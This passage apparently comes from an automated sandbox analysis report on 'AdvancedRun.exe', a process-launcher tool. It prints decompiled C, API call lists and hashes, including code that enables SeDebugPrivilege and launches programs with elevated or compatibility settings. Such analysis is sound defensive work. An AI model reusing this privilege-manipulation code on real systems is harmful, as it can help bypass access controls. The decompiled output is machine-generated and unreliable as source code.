					L0040B26C();
					 *0x41c464 = _t31;
					_t56 = 2;
					_t33 =  *0x41c478 * _t56;
					_push( ~(0 | _t60 > 0x00000000) | _t33);
					L0040B26C();
					 *0x41c45c = _t33;
					return _t33;
				}
				return _t25;
			}













                                                                                                                0x00405adf
                                                                                                                0x00405ae6
                                                                                                                0x00405af5
                                                                                                                0x00405af6
                                                                                                                0x00405afb
                                                                                                                0x00405b00
                                                                                                                0x00405b0a
                                                                                                                0x00405b18
                                                                                                                0x00405b19
                                                                                                                0x00405b1e
                                                                                                                0x00405b2c
                                                                                                                0x00405b2d
                                                                                                                0x00405b36
                                                                                                                0x00405b37
                                                                                                                0x00405b3c
                                                                                                                0x00405b4a
                                                                                                                0x00405b4b
                                                                                                                0x00405b54
                                                                                                                0x00405b55
                                                                                                                0x00405b5a
                                                                                                                0x00405b68
                                                                                                                0x00405b69
                                                                                                                0x00405b72
                                                                                                                0x00405b73
                                                                                                                0x00405b7b
                                                                                                                0x00000000
                                                                                                                0x00405b7b
                                                                                                                0x00405b80

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??2@
                                                                                                                • String ID:
                                                                                                                • API String ID: 1033339047-0
                                                                                                                • Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                                • Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
                                                                                                                • Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                                • Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Analysis Process: AdvancedRun.exe PID: 4824 Parent PID: 5008 AdvancedRun.exeCOMMON

                                                                                                                Executed Functions

                                                                                                                Function 00408FC9, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* __esi;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t18;
				long _t19;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t24;
				struct HINSTANCE__** _t35;
				void* _t37;

				_t37 = __eflags;
				_t35 = __eax;
				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
					return GetLastError();
				}
				_t16 = E00408F72(_t35);
				__eflags = _t16;
				if(_t16 != 0) {
					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
					__eflags = _t24;
					if(_t24 != 0) {
						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
					}
				}
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				_a4 = _v8;
				_t18 = E00408F72(_t35);
				__eflags = _t18;
				if(_t18 != 0) {
					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
					__eflags = _t22;
					if(_t22 != 0) {
						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
					}
				}
				_t19 = GetLastError();
				FindCloseChangeNotification(_v8); // executed
				return _t19;
			}














                                                                                                                0x00408fc9
                                                                                                                0x00408fd0
                                                                                                                0x00408fe8
                                                                                                                0x00000000
                                                                                                                0x00408fea
                                                                                                                0x00408ff4
                                                                                                                0x00409001
                                                                                                                0x00409003
                                                                                                                0x0040900c
                                                                                                                0x0040900e
                                                                                                                0x00409010
                                                                                                                0x0040901a
                                                                                                                0x0040901a
                                                                                                                0x00409010
                                                                                                                0x0040901f
                                                                                                                0x00409026
                                                                                                                0x0040902d
                                                                                                                0x00409030
                                                                                                                0x00409035
                                                                                                                0x00409037
                                                                                                                0x00409040
                                                                                                                0x00409042
                                                                                                                0x00409044
                                                                                                                0x00409051
                                                                                                                0x00409051
                                                                                                                0x00409044
                                                                                                                0x00409053
                                                                                                                0x0040905e
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                  • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
                                                                                                                • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
                                                                                                                • AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
                                                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
                                                                                                                • String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
                                                                                                                • API String ID: 616250965-1253513912
                                                                                                                • Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                • Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
                                                                                                                • Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                • Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004022D5, Relevance: 61.7, APIs: 25, Strings: 10, Instructions: 435COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
				WCHAR* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				char* _v24;
				int _v28;
				intOrPtr _v32;
				int _v36;
				int _v40;
				char _v44;
				void* _v56;
				int _v60;
				char _v92;
				void _v122;
				int _v124;
				short _v148;
				signed int _v152;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				void _v192;
				char _v196;
				char _v228;
				void _v258;
				int _v260;
				void _v786;
				short _v788;
				void _v1314;
				short _v1316;
				void _v1842;
				short _v1844;
				void _v18234;
				short _v18236;
				char _v83772;
				void* __ebx;
				void* __edi;
				void* __esi;
				short* _t174;
				short _t175;
				signed int _t176;
				short _t177;
				short _t178;
				int _t184;
				signed int _t187;
				intOrPtr _t207;
				intOrPtr _t219;
				int* _t252;
				int* _t253;
				int* _t266;
				int* _t267;
				wchar_t* _t270;
				int _t286;
				void* _t292;
				void* _t304;
				WCHAR* _t308;
				WCHAR* _t310;
				intOrPtr* _t311;
				int _t312;
				WCHAR* _t315;
				void* _t325;
				void* _t328;

				_t304 = __edx;
				E0040B550(0x1473c, __ecx);
				_t286 = 0;
				 *_a4 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				memset( &_v192, 0, 0x40);
				_v60 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 = 0;
				_v40 = 0;
				_v28 = 0;
				_v36 = 0;
				_v32 = 0x100;
				_v44 = 0;
				_v1316 = 0;
				memset( &_v1314, 0, 0x208);
				_v788 = 0;
				memset( &_v786, 0, 0x208);
				_t315 = _a8;
				_t328 = _t325 + 0x24;
				_v83772 = 0;
				_v196 = 0x44;
				E00404923(0x104,  &_v788, _t315);
				if(wcschr(_t315, 0x25) != 0) {
					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
				}
				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
					_v8 = _t286;
					_v1844 = _t286;
					memset( &_v1842, _t286, 0x208);
					_t328 = _t328 + 0xc;
					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
					if(_v1844 != _t286) {
						E00404923(0x104,  &_v788,  &_v1844);
					}
				}
				_t308 =  &(_t315[0x2106]);
				if( *_t308 == _t286) {
					E00404B5C( &_v1316,  &_v788);
					__eflags = _v1316 - _t286;
					_t315 = _a8;
					_pop(_t292);
					if(_v1316 == _t286) {
						goto L11;
					}
					goto L10;
				} else {
					_v20 = _t308;
					_t270 = wcschr(_t308, 0x25);
					_pop(_t292);
					if(_t270 == 0) {
						L11:
						_t174 =  &(_t315[0x220e]);
						if( *_t174 != 1) {
							_v152 = _v152 | 0x00000001;
							_v148 =  *_t174;
						}
						_t309 = ",";
						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
							_v152 = _v152 | 0x00000004;
							_t266 =  &_v260;
							_push(_t266);
							L0040B1F8();
							_v180 = _t266;
							_t328 = _t328 + 0x3c;
							_t267 =  &_v124;
							L0040B1F8();
							_t292 = _t267;
							_v176 = _t267;
						}
						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
							_v152 = _v152 | 0x00000002;
							_t252 =  &_v260;
							_push(_t252);
							L0040B1F8();
							_v172 = _t252;
							_t328 = _t328 + 0x3c;
							_t253 =  &_v124;
							_push(_t253);
							L0040B1F8();
							_v168 = _t253;
						}
						_t310 =  &(_t315[0x105]);
						if( *_t310 != _t286) {
							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
								_push(_t310);
							} else {
								_v18236 = _t286;
								memset( &_v18234, _t286, 0x4000);
								_t328 = _t328 + 0xc;
								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
								_push( &_v18236);
							}
							_push( &_v788);
							_push(L"\"%s\" %s");
							_push(0x7fff);
							_push( &_v83772);
							L0040B1EC();
							_v24 =  &_v83772;
						}
						_t175 = _t315[0x220c];
						if(_t175 != 0x20) {
							_v12 = _t175;
						}
						_t311 = _a4;
						if(_t315[0x2254] == 2) {
							E00401D1E(_t311, L"RunAsInvoker");
						}
						_t176 = _t315[0x265c];
						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
						}
						_t177 = _t315[0x265e];
						if(_t177 != 1) {
							__eflags = _t177 - 2;
							if(_t177 != 2) {
								goto L37;
							}
							_push(L"16BITCOLOR");
							goto L36;
						} else {
							_push(L"256COLOR");
							L36:
							E00401D1E(_t311);
							L37:
							if(_t315[0x2660] == _t286) {
								__eflags = _t315[0x2662] - _t286;
								if(_t315[0x2662] == _t286) {
									__eflags = _t315[0x2664] - _t286;
									if(_t315[0x2664] == _t286) {
										__eflags = _t315[0x2666] - _t286;
										if(_t315[0x2666] == _t286) {
											L46:
											_t178 = _t315[0x2a6e];
											_t358 = _t178 - 3;
											if(_t178 != 3) {
												__eflags = _t178 - 2;
												if(_t178 != 2) {
													__eflags =  *_t311 - _t286;
													if( *_t311 == _t286) {
														_push(_t286);
													} else {
														_push(_t311);
													}
													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
													L63:
													_t293 = _t311;
													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
													_t312 = _t184;
													if(_t312 == _t286 && _v60 != _t286) {
														_t363 = _t315[0x266c] - _t286;
														if(_t315[0x266c] != _t286) {
															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
															_a4 = _a4 | 0xffffffff;
															_a8 = _t286;
															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
														}
													}
													E004055D1(_t184,  &_v44);
													return _t312;
												}
												E00405497( &_v92);
												E00405497( &_v228);
												E0040149F(__eflags,  &_v92);
												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
												E00401551( &_v228, _t304, __eflags,  &_v92);
												_t204 = _a4;
												__eflags =  *_a4;
												if(__eflags != 0) {
													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
												}
												E00401421( &_v44, _t304,  &_v92, __eflags);
												_t207 = _v28;
												__eflags = _t207;
												_v16 = 0x40c4e8;
												if(_t207 != 0) {
													_v16 = _t207;
												}
												_v12 = _v12 | 0x00000400;
												E004054B9( &_v228);
												E004054B9( &_v92);
												_t286 = 0;
												__eflags = 0;
												L58:
												_t315 = _a8;
												_t311 = _a4;
												goto L63;
											}
											E00405497( &_v92);
											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
											_t359 =  *_t311 - _t286;
											if( *_t311 != _t286) {
												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
											}
											E00401421( &_v44, _t304,  &_v92, _t359);
											_t219 = _v28;
											_v16 = 0x40c4e8;
											if(_t219 != _t286) {
												_v16 = _t219;
											}
											_v12 = _v12 | 0x00000400;
											E004054B9( &_v92);
											goto L58;
										}
										_push(L"HIGHDPIAWARE");
										L45:
										E00401D1E(_t311);
										goto L46;
									}
									_push(L"DISABLEDWM");
									goto L45;
								}
								_push(L"DISABLETHEMES");
								goto L45;
							}
							_push(L"640X480");
							goto L45;
						}
					}
					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
					L10:
					_v20 =  &_v1316;
					goto L11;
				}
			}

































































                                                                                                                0x004022d5
                                                                                                                0x004022dd
                                                                                                                0x004022e7
                                                                                                                0x004022ec
                                                                                                                0x004022f7
                                                                                                                0x004022fa
                                                                                                                0x004022fd
                                                                                                                0x00402300
                                                                                                                0x00402307
                                                                                                                0x0040230d
                                                                                                                0x0040230e
                                                                                                                0x00402318
                                                                                                                0x00402321
                                                                                                                0x00402324
                                                                                                                0x00402327
                                                                                                                0x0040232a
                                                                                                                0x0040232d
                                                                                                                0x00402334
                                                                                                                0x00402337
                                                                                                                0x0040233e
                                                                                                                0x0040234f
                                                                                                                0x00402356
                                                                                                                0x0040235b
                                                                                                                0x0040235e
                                                                                                                0x0040236d
                                                                                                                0x00402374
                                                                                                                0x0040237e
                                                                                                                0x00402395
                                                                                                                0x004023a0
                                                                                                                0x004023a0
                                                                                                                0x004023ac
                                                                                                                0x004023cf
                                                                                                                0x004023d2
                                                                                                                0x004023d9
                                                                                                                0x004023de
                                                                                                                0x004023f6
                                                                                                                0x00402403
                                                                                                                0x00402414
                                                                                                                0x00402419
                                                                                                                0x00402403
                                                                                                                0x0040241a
                                                                                                                0x00402423
                                                                                                                0x00402458
                                                                                                                0x0040245d
                                                                                                                0x00402464
                                                                                                                0x00402467
                                                                                                                0x00402468
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402425
                                                                                                                0x00402428
                                                                                                                0x0040242b
                                                                                                                0x00402433
                                                                                                                0x00402434
                                                                                                                0x00402473
                                                                                                                0x00402473
                                                                                                                0x0040247c
                                                                                                                0x00402481
                                                                                                                0x00402488
                                                                                                                0x00402488
                                                                                                                0x00402495
                                                                                                                0x0040249a
                                                                                                                0x004024b7
                                                                                                                0x004024be
                                                                                                                0x004024cd
                                                                                                                0x004024d1
                                                                                                                0x004024ed
                                                                                                                0x004024f0
                                                                                                                0x00402506
                                                                                                                0x0040250b
                                                                                                                0x00402512
                                                                                                                0x00402518
                                                                                                                0x00402519
                                                                                                                0x0040251e
                                                                                                                0x00402524
                                                                                                                0x00402527
                                                                                                                0x0040252b
                                                                                                                0x00402530
                                                                                                                0x00402531
                                                                                                                0x00402531
                                                                                                                0x0040253d
                                                                                                                0x0040255a
                                                                                                                0x00402561
                                                                                                                0x00402570
                                                                                                                0x00402574
                                                                                                                0x00402590
                                                                                                                0x00402593
                                                                                                                0x004025a9
                                                                                                                0x004025ae
                                                                                                                0x004025b5
                                                                                                                0x004025bb
                                                                                                                0x004025bc
                                                                                                                0x004025c1
                                                                                                                0x004025c7
                                                                                                                0x004025ca
                                                                                                                0x004025cd
                                                                                                                0x004025ce
                                                                                                                0x004025d4
                                                                                                                0x004025d4
                                                                                                                0x004025da
                                                                                                                0x004025e3
                                                                                                                0x004025eb
                                                                                                                0x00402633
                                                                                                                0x004025fb
                                                                                                                0x00402608
                                                                                                                0x0040260f
                                                                                                                0x00402614
                                                                                                                0x00402624
                                                                                                                0x00402630
                                                                                                                0x00402630
                                                                                                                0x0040263a
                                                                                                                0x0040263b
                                                                                                                0x00402646
                                                                                                                0x0040264b
                                                                                                                0x0040264c
                                                                                                                0x0040265a
                                                                                                                0x0040265a
                                                                                                                0x0040265d
                                                                                                                0x00402666
                                                                                                                0x00402668
                                                                                                                0x00402668
                                                                                                                0x00402672
                                                                                                                0x00402675
                                                                                                                0x0040267e
                                                                                                                0x0040267e
                                                                                                                0x00402683
                                                                                                                0x0040268b
                                                                                                                0x0040269e
                                                                                                                0x0040269e
                                                                                                                0x004026a3
                                                                                                                0x004026ac
                                                                                                                0x004026b5
                                                                                                                0x004026b8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004026ba
                                                                                                                0x00000000
                                                                                                                0x004026ae
                                                                                                                0x004026ae
                                                                                                                0x004026bf
                                                                                                                0x004026c1
                                                                                                                0x004026c6
                                                                                                                0x004026cc
                                                                                                                0x004026d5
                                                                                                                0x004026db
                                                                                                                0x004026e4
                                                                                                                0x004026ea
                                                                                                                0x004026f3
                                                                                                                0x004026f9
                                                                                                                0x00402707
                                                                                                                0x00402707
                                                                                                                0x0040270d
                                                                                                                0x00402710
                                                                                                                0x0040276d
                                                                                                                0x00402770
                                                                                                                0x0040280b
                                                                                                                0x0040280e
                                                                                                                0x00402813
                                                                                                                0x00402810
                                                                                                                0x00402810
                                                                                                                0x00402810
                                                                                                                0x00402819
                                                                                                                0x0040281f
                                                                                                                0x00402836
                                                                                                                0x00402841
                                                                                                                0x00402846
                                                                                                                0x0040284a
                                                                                                                0x00402851
                                                                                                                0x00402857
                                                                                                                0x00402860
                                                                                                                0x00402865
                                                                                                                0x00402876
                                                                                                                0x00402879
                                                                                                                0x00402888
                                                                                                                0x00402888
                                                                                                                0x00402857
                                                                                                                0x00402891
                                                                                                                0x0040289c
                                                                                                                0x0040289c
                                                                                                                0x00402779
                                                                                                                0x00402784
                                                                                                                0x0040278d
                                                                                                                0x004027a4
                                                                                                                0x004027b3
                                                                                                                0x004027b8
                                                                                                                0x004027bb
                                                                                                                0x004027bf
                                                                                                                0x004027c6
                                                                                                                0x004027c6
                                                                                                                0x004027d1
                                                                                                                0x004027d6
                                                                                                                0x004027d9
                                                                                                                0x004027db
                                                                                                                0x004027e2
                                                                                                                0x004027e4
                                                                                                                0x004027e4
                                                                                                                0x004027e7
                                                                                                                0x004027f4
                                                                                                                0x004027fc
                                                                                                                0x00402801
                                                                                                                0x00402801
                                                                                                                0x00402803
                                                                                                                0x00402803
                                                                                                                0x00402806
                                                                                                                0x00000000
                                                                                                                0x00402806
                                                                                                                0x00402715
                                                                                                                0x00402729
                                                                                                                0x0040272e
                                                                                                                0x00402731
                                                                                                                0x00402738
                                                                                                                0x00402738
                                                                                                                0x00402743
                                                                                                                0x00402748
                                                                                                                0x0040274d
                                                                                                                0x00402754
                                                                                                                0x00402756
                                                                                                                0x00402756
                                                                                                                0x00402759
                                                                                                                0x00402763
                                                                                                                0x00000000
                                                                                                                0x00402763
                                                                                                                0x004026fb
                                                                                                                0x00402700
                                                                                                                0x00402702
                                                                                                                0x00000000
                                                                                                                0x00402702
                                                                                                                0x004026ec
                                                                                                                0x00000000
                                                                                                                0x004026ec
                                                                                                                0x004026dd
                                                                                                                0x00000000
                                                                                                                0x004026dd
                                                                                                                0x004026ce
                                                                                                                0x00000000
                                                                                                                0x004026ce
                                                                                                                0x004026ac
                                                                                                                0x00402443
                                                                                                                0x0040246a
                                                                                                                0x00402470
                                                                                                                0x00000000
                                                                                                                0x00402470

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00402300
                                                                                                                • memset.MSVCRT ref: 0040233E
                                                                                                                • memset.MSVCRT ref: 00402356
                                                                                                                  • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                  • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                • wcschr.MSVCRT ref: 00402387
                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0
                                                                                                                  • Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
                                                                                                                  • Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69
                                                                                                                • wcschr.MSVCRT ref: 004023B7
                                                                                                                • memset.MSVCRT ref: 004023D9
                                                                                                                • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
                                                                                                                • wcschr.MSVCRT ref: 0040242B
                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
                                                                                                                • memset.MSVCRT ref: 004024BE
                                                                                                                • memset.MSVCRT ref: 004024D1
                                                                                                                • _wtoi.MSVCRT ref: 00402519
                                                                                                                • _wtoi.MSVCRT ref: 0040252B
                                                                                                                • memset.MSVCRT ref: 00402561
                                                                                                                • memset.MSVCRT ref: 00402574
                                                                                                                • _wtoi.MSVCRT ref: 004025BC
                                                                                                                • _wtoi.MSVCRT ref: 004025CE
                                                                                                                • wcschr.MSVCRT ref: 004025F0
                                                                                                                • memset.MSVCRT ref: 0040260F
                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
                                                                                                                • _snwprintf.MSVCRT ref: 0040264C
                                                                                                                • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
                                                                                                                • GetProcessAffinityMask.KERNEL32(?,?,000000FF), ref: 00402879
                                                                                                                • SetProcessAffinityMask.KERNEL32(?,000000FF), ref: 00402888
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
                                                                                                                • String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
                                                                                                                • API String ID: 2452314994-435178042
                                                                                                                • Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                • Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
                                                                                                                • Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                • Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00408533, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 259COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 89%
                                                                                                                			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
				char _v0;
				WCHAR* _v4;
				void* __edi;
				void* __esi;
				void* _t76;
				void* _t82;
				wchar_t* _t85;
				void* _t86;
				void* _t87;
				intOrPtr _t92;
				wchar_t* _t93;
				intOrPtr _t95;
				int _t106;
				char* _t110;
				intOrPtr _t115;
				wchar_t* _t117;
				intOrPtr _t124;
				wchar_t* _t125;
				intOrPtr _t131;
				wchar_t* _t132;
				int _t154;
				int _t156;
				void* _t159;
				intOrPtr _t162;
				void* _t177;
				void* _t178;
				void* _t179;
				intOrPtr _t181;
				int _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t198;
				signed int _t205;
				signed int _t206;

				_t179 = __edx;
				_t158 = __ecx;
				_t206 = _t205 & 0xfffffff8;
				E0040B550(0x1ccc, __ecx);
				_t76 = E0040313D(_t158);
				if(_t76 != 0) {
					E0040AC52();
					SetErrorMode(0x8001); // executed
					_t156 = 0;
					 *0x40fa70 = 0x11223344;
					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
					_t82 = E00405497( &_a8);
					_a48 = 0x20;
					_a40 = 0;
					_a52 = 0;
					_a44 = 0;
					_a56 = 0;
					E004056B5(_t158, __eflags, _t82, _a12); // executed
					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
					 *_t206 = L"/SpecialRun";
					_t85 = E0040585C( &_v0);
					__eflags = _t85;
					if(_t85 != 0) {
						L8:
						_t86 = E0040585C( &_a8, L"/Run");
						__eflags = _t86 - _t156;
						if(_t86 < _t156) {
							_t87 = E0040585C( &_a8, L"/cfg");
							__eflags = _t87 - _t156;
							if(_t87 >= _t156) {
								_t162 =  *0x40fa74; // 0x4101c8
								_t41 = _t87 + 1; // 0x1
								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
								_t115 =  *0x40fa74; // 0x4101c8
								_t117 = wcschr(_t115 + 0x5504, 0x5c);
								__eflags = _t117;
								if(_t117 == 0) {
									_a92 = _t156;
									memset( &_a94, _t156, 0x208);
									_a620 = _t156;
									memset( &_a622, _t156, 0x208);
									GetCurrentDirectoryW(0x104,  &_a92);
									_t124 =  *0x40fa74; // 0x4101c8
									_t125 = _t124 + 0x5504;
									_v4 = _t125;
									_t187 = wcslen(_t125);
									_t51 = wcslen( &_a92) + 1; // 0x1
									__eflags = _t187 + _t51 - 0x104;
									if(_t187 + _t51 >= 0x104) {
										_a620 = _t156;
									} else {
										E00404BE4( &_a620,  &_a92, _v4);
									}
									_t131 =  *0x40fa74; // 0x4101c8
									_t132 = _t131 + 0x5504;
									__eflags = _t132;
									wcscpy(_t132,  &_a620);
								}
							}
							E00402F31(_t156);
							_t181 =  *0x40fa74; // 0x4101c8
							_pop(_t159);
							_a84 =  &_a8;
							_a76 = 0x40cb0c;
							_a88 = _t156;
							_a80 = _t156;
							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
							_t92 =  *0x40fa74; // 0x4101c8
							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
								_t93 = E0040585C( &_a8, L"/savelangfile");
								__eflags = _t93;
								if(_t93 < 0) {
									E00406420();
									__imp__CoInitialize(_t156);
									_t95 =  *0x40fa74; // 0x4101c8
									E00408910(_t95 + 0x10, _t159, 0x416f60);
									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
									_t198 =  *0x40fa74; // 0x4101c8
									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
									E00402F31(1);
									__imp__CoUninitialize();
								} else {
									E004065BE(_t159);
								}
